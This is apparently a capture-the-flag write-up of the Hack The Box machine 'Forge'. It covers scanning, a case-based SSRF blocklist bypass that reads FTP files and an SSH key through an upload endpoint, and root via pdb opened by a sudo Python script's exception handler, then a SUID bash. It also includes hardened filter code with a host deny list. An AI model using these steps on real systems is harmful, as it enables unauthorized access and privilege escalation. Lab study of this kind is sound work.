Write Up

Uploaded by

viky patni

Forge

Nmap

➜ Forge nmap -sV -sC -T3 10.10.11.111 -oN nmap/scan.nmap

Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-12 17:20 +0530
Nmap scan report for 10.10.11.111
Host is up (0.20s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE    SERVICE VERSION
21/tcp filtered ftp
22/tcp open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 4f:78:65:66:29:e4:87:6b:3c:cc:b4:3a:d2:57:20:ac (RSA)
|   256 79:df:3a:f1:fe:87:4a:57:b0:fd:4e:d0:54:c6:28:d9 (ECDSA)
|_  256 b0:58:11:40:6d:8c:bd:c5:72:aa:83:08:c5:51:fb:33 (ED25519)
80/tcp open     http    Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://forge.htb
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: 10.10.11.111; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.36 seconds
➜ Forge

vhost enum

ffuf -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt -u http://forge.htb/ -H "Host: FUZZ.forge.htb" -t 200 -fl 10

➜ Forge ffuf -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt -u http://forge.htb/ -H "Host: FUZZ.forge.htb" -t 200 -fl 10

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://forge.htb/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt
 :: Header           : Host: FUZZ.forge.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 200
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response lines: 10
________________________________________________

admin                   [Status: 200, Size: 27, Words: 4, Lines: 2, Duration: 763ms]
:: Progress: [484699/484699] :: Job [1/1] :: 909 req/sec :: Duration: [0:11:28] :: Errors: 0 ::
➜ Forge

Port 80 is open.
There is a subdomain called admin.
We found a vhost called forge.htb (visiting port 80 redirects to it).
We can't access the admin subdomain directly; it is reachable from localhost only.

If we go to the /uploads endpoint on forge.htb we see an interesting option to upload files via a link.

If we try to access localhost from here we get a "blacklisted domain" message, and the same happens for admin.forge.htb.
But we can easily bypass this by writing admin.forge.htb in all caps:

http://ADMIN.FORGE.HTB/
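The all-caps bypass works against a filter that compares the raw URL string. Below, as an added example and not the box's application code, a weak check of that shape sits next to a hardened one that parses the URL, normalises the host and judges the resolved address; the blocklist contents and the FAKE_DNS table are constructed for the example.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hosts the upload endpoint must never fetch from (constructed list).
BLOCKED_HOSTS = {"localhost", "127.0.0.1", "admin.forge.htb"}
ALLOWED_SCHEMES = {"http", "https"}

# Constructed DNS table so the example runs offline; values are hypothetical.
FAKE_DNS = {
    "admin.forge.htb": "127.0.0.1",
    "forge.htb": "10.10.11.111",
    "example.com": "93.184.216.34",
}


def fake_resolve(host: str) -> str:
    """Stand-in for socket.gethostbyname backed by FAKE_DNS."""
    if host not in FAKE_DNS:
        raise socket.gaierror(f"cannot resolve {host}")
    return FAKE_DNS[host]


def weak_is_blocked(url: str) -> bool:
    """Case-sensitive substring test: 'ADMIN.FORGE.HTB' is not 'admin.forge.htb'."""
    return any(bad in url for bad in BLOCKED_HOSTS)


def hardened_is_blocked(url: str, resolver=fake_resolve) -> bool:
    """Return True when the fetch must be refused."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return True
    # .hostname is already lower-cased and stripped of userinfo and port,
    # so user:pass@ prefixes and ADMIN.FORGE.HTB collapse to the same host.
    host = (parts.hostname or "").rstrip(".")
    if not host or host in BLOCKED_HOSTS:
        return True
    try:
        addr = ipaddress.ip_address(resolver(host))
    except (socket.gaierror, ValueError):
        return True
    # Refuse loopback, RFC 1918 and other non-global ranges; the caller should
    # then connect to `addr` itself so a DNS re-resolution cannot move the target.
    return not addr.is_global
```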

After doing so we get a link; if we curl it and view the content, we notice an interesting endpoint called announcements.

<!DOCTYPE html>
<html>
<head>
    <title>Admin Portal</title>
</head>
<body>
    <link rel="stylesheet" type="text/css" href="/static/css/main.css">
    <header>
        <nav>
            <h1 class=""><a href="/">Portal home</a></h1>
            <h1 class="align-right margin-right"><a href="/announcements">Announcements</a></h1>
            <h1 class="align-right"><a href="/upload">Upload image</a></h1>
        </nav>
    </header>
    <br><br><br><br>
    <br><br><br><br>
    <center><h1>Welcome Admins!</h1></center>
</body>
</html>

So let's view the content of that endpoint:

http://ADMIN.FORGE.HTB/announcements

<!DOCTYPE html>
<html>
<head>
    <title>Announcements</title>
</head>
<body>
    <link rel="stylesheet" type="text/css" href="/static/css/main.css">
    <link rel="stylesheet" type="text/css" href="/static/css/announcements.css">
    <header>
        <nav>
            <h1 class=""><a href="/">Portal home</a></h1>
            <h1 class="align-right margin-right"><a href="/announcements">Announcements</a></h1>
            <h1 class="align-right"><a href="/upload">Upload image</a></h1>
        </nav>
    </header>
    <br><br><br>
    <ul>
        <li>An internal ftp server has been setup with credentials as user:heightofsecurity123!</li>
        <li>The /upload endpoint now supports ftp, ftps, http and https protocols for uploading from url.</li>
        <li>The /upload endpoint has been configured for easy scripting of uploads, and for uploading an image, one can simply pass a url with ?u=&lt;url&gt;.</li>
    </ul>
</body>
</html>

And we have some interesting information:

An internal ftp server has been setup with credentials as user:heightofsecurity123!
The /upload endpoint now supports ftp, ftps, http and https protocols for uploading from url.
The /upload endpoint has been configured for easy scripting of uploads, and for uploading an image, one can simply pass a url with ?u=<url>.

Let's try to access the FTP server first by passing an ftp URL in the GET parameter to the admin vhost:

http://ADMIN.FORGE.HTB/upload?u=ftp://user:[email protected]

And we can see the contents of the FTP directory:

drwxr-xr-x 3 1000 1000 4096 Aug 04 19:23 snap
-rw-r----- 1    0 1000   33 Sep 08 08:13 user.txt

So this must be the home directory of the user, so I checked for the id_rsa key and it worked:

http://ADMIN.FORGE.HTB/upload?u=ftp://user:[email protected]/.ssh/id_rsa

And we get the key:

-----BEGIN OPENSSH PRIVATE KEY-----
[key body omitted]
-----END OPENSSH PRIVATE KEY-----

For now we only have one username, user, which we found via the FTP listing, so let's try SSH with it:

ssh -i user.key [email protected]

After SSHing in we can see that we can run a script as root:

user@forge:~$ sudo -l
Matching Defaults entries for user on forge:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:

User user may run the following commands on forge:
    (ALL : ALL) NOPASSWD: /usr/bin/python3 /opt/remote-manage.py
user@forge:~$

And the content of the script is:

#!/usr/bin/env python3
import socket
import random
import subprocess
import pdb

port = random.randint(1025, 65535)

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(('127.0.0.1', port))
    sock.listen(1)
    print(f'Listening on localhost:{port}')
    (clientsock, addr) = sock.accept()
    clientsock.send(b'Enter the secret passsword: ')
    if clientsock.recv(1024).strip().decode() != 'secretadminpassword':
        clientsock.send(b'Wrong password!\n')
    else:
        clientsock.send(b'Welcome admin!\n')
        while True:
            clientsock.send(b'\nWhat do you wanna do: \n')
            clientsock.send(b'[1] View processes\n')
            clientsock.send(b'[2] View free memory\n')
            clientsock.send(b'[3] View listening sockets\n')
            clientsock.send(b'[4] Quit\n')
            option = int(clientsock.recv(1024).strip())
            if option == 1:
                clientsock.send(subprocess.getoutput('ps aux').encode())
            elif option == 2:
                clientsock.send(subprocess.getoutput('df').encode())
            elif option == 3:
                clientsock.send(subprocess.getoutput('ss -lnt').encode())
            elif option == 4:
                clientsock.send(b'Bye\n')
                break
except Exception as e:
    print(e)
    pdb.post_mortem(e.__traceback__)
finally:
    quit()

If you go through the script you can see there is a try/except block, and interestingly, if an exception happens it opens pdb.

If you don't know, pdb is the Python debugger.

So how can we exploit this? Basically we need to raise an exception. If you check the if statement, they don't handle an else case, and the input is passed straight through int(), so if we send something other than 1-4 that int() cannot parse it raises an exception. So run the script as root and connect to the port with nc from another terminal (SSH in again and nc to that port):

user@forge:~$ sudo /usr/bin/python3 /opt/remote-manage.py
Listening on localhost:42512

nc localhost 42512

and enter the password:

secretadminpassword

Now enter something invalid:

user@forge:~$ nc localhost 17089
Enter the secret passsword: secretadminpassword
Welcome admin!

What do you wanna do:
[1] View processes
[2] View free memory
[3] View listening sockets
[4] Quit
hopeyoulikethewriteup

Since they don't handle this input, it raises an exception, and because of that the script opens pdb:

except Exception as e:
    print(e)
    pdb.post_mortem(e.__traceback__)
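A hardened shape of the same menu handler, as an added example and not the script from the box: the option is parsed defensively, an unrecognised option gets an error reply instead of an exception, and a failing command is logged rather than handed to pdb.post_mortem inside a process running as root. The function names and the injectable `run` parameter are assumptions made for the example.

```python
import logging
import subprocess
from typing import Callable, Optional, Tuple

log = logging.getLogger("remote-manage")

# Same menu and commands as the script on the box ('df' kept as it was).
MENU = {
    1: ("View processes", "ps aux"),
    2: ("View free memory", "df"),
    3: ("View listening sockets", "ss -lnt"),
}
QUIT = 4


def parse_option(raw: bytes) -> Optional[int]:
    """Return the menu number the client sent, or None if it is not one.

    The original did int(clientsock.recv(1024).strip()) with no guard, so a
    non-numeric line raised ValueError and the except block opened pdb.
    """
    try:
        value = int(raw.strip())
    except ValueError:
        return None
    return value if value in MENU or value == QUIT else None


def handle(raw: bytes,
           run: Callable[[str], str] = subprocess.getoutput) -> Tuple[bytes, bool]:
    """Process one client line; return (reply, keep_serving).

    `run` is injectable (hypothetical parameter) so the dispatch can be
    exercised without spawning ps/df/ss.
    """
    option = parse_option(raw)
    if option is None:
        return b"Invalid option, choose 1-4\n", True
    if option == QUIT:
        return b"Bye\n", False
    _, cmd = MENU[option]
    try:
        return run(cmd).encode(), True
    except Exception:
        # Record the traceback for the operator; never pdb.post_mortem() here,
        # since an interactive debugger in a root process is a shell for
        # anyone who can reach the socket.
        log.exception("command %r failed", cmd)
        return b"Internal error\n", True
```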

Once we have the pdb prompt we can execute arbitrary Python, so import os and set the SUID bit on /bin/bash, which gives us root easily:

(Pdb) import os
(Pdb) os.system('chmod u+s /bin/bash')

And we can see the SUID bit is set on /bin/bash:

user@forge:~$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1183448 Jun 18  2020 /bin/bash
user@forge:~$

Now get root and enjoy!

/bin/bash -p

bash-5.0# cd /root
bash-5.0# cat root.txt
eb2b840fca52fc3658cc011e4995f4af
bash-5.0#
